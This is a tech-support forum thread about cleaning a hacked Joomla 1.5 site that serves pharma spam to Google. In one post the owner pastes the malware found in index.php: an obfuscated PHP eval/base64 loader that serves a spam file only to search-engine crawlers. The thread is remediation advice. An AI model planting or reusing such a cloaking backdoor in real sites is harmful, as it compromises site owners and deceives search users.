Solved

I have a site that has got viagra and other spam stuff all through their site on google.

Posted on 2014-09-03
7
188 Views
Last Modified: 2014-09-18
Hi,
On my site here http://simmental.com.au you will notice that if you google search it, there are spam words through out the site.
How do I clean this site up and get rid of the garbage?
Thank you
0
Comment
Question by:Amanda Watson
  • 3
  • 3
7 Comments
 
LVL 58

Assisted Solution

by:Gary
Gary earned 100 total points
ID: 40302498
Is this a CMS?
Can you give some example pages where the spam is?

Obviously someone has hacked the site and you need to check all your files for funny things like base64 encoded code
Change all your passwords - ftp etc - immediately
0
 
LVL 11

Author Comment

by:Amanda Watson
ID: 40309123
Thanks,  changing passwords etc is obvious now!, but how can I fix whats is there.....do all files have to be tested?
0
 
LVL 58

Expert Comment

by:Gary
ID: 40309125
Yes, unless you have a backup you can upload.
0
Master Your Team's Linux and Cloud Stack!

The average business loses $13.5M per year to ineffective training (per 1,000 employees). Keep ahead of the competition and combine in-person quality with online cost and flexibility by training with Linux Academy.

 
LVL 11

Author Comment

by:Amanda Watson
ID: 40315987
I found this on the index page
<?php @eval(base64_decode("aWYgKEBwcmVnX21hdGNoICgiL1tHZ11bT29dW09vXVtHZ11bTGxdW0VlXXxbTGxdW0lpXVtWdl1bRWVdfFtNbV1bU3NdW05uXXxbWXldW0FhXVtIaF1bT29dW09vXXxbQWFdW1NzXVtLa118W0FhXVtPb11bTGxdfFtCYl1bT29dW1R0XS8iLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpIHsKCWlmIChAaXNfZmlsZSgiLi9pbWFnZXMvc3Rvcmllcy9saXN0LnR4dCIpKSB7CgkJQGluY2x1ZGUgIi4vaW1hZ2VzL3N0b3JpZXMvbGlzdC50eHQiOwoJfQp9Cg==")); ?>


Could that be the only area or cultprit?
A
0
 
LVL 58

Expert Comment

by:Gary
ID: 40315992
Usually its one or 2 files, if you remove it is it fixed
0
 
LVL 16

Accepted Solution

by:
Lucas Bishop earned 400 total points
ID: 40318680
In viewing the source code of your site, I see you're using Joomla 1.5 as your CMS.  The version you are using reached end of life in Sep 2012. See the announcement here: http://docs.joomla.org/Joomla_1.5_version_history

You can remove any malicious scripts you find in the source code of your site, but odds are, there are a variety of security holes in your CMS. Hence, if you remove the malicious files today, they'll probably be inserted again shortly thereafter.  You can search google for "joomla 1.5 exploit" and find a slew of potential culprits that can effect your current setup.

Finally, I decoded the script you posted above and the following file is being referenced in it, from your server... I'd delete this: http://simmental.com.au/images/stories/list.txt
0
 
LVL 11

Author Closing Comment

by:Amanda Watson
ID: 40331789
Well advised
0

Featured Post

3 Use Cases for Connected Systems

Our Dev teams are like yours. They’re continually cranking out code for new features/bugs fixes, testing, deploying, testing some more, responding to production monitoring events and more. It’s complex. So, we thought you’d like to see what’s working for us.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Encryption for Business Encryption (https://en.wikipedia.org/wiki/Encryption) ensures the safety of our data when sending emails. In most cases, to read an encrypted email you must enter a secret key that will enable you to decrypt the email. T…
This article will inform Clients about common and important expectations from the freelancers (Experts) who are looking at your Gig.
Viewers will get an overview of the benefits and risks of using Bitcoin to accept payments. What Bitcoin is: Legality: Risks: Benefits: Which businesses are best suited?: Other things you should know: How to get started:
This video teaches users how to migrate an existing Wordpress website to a new domain.

772 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question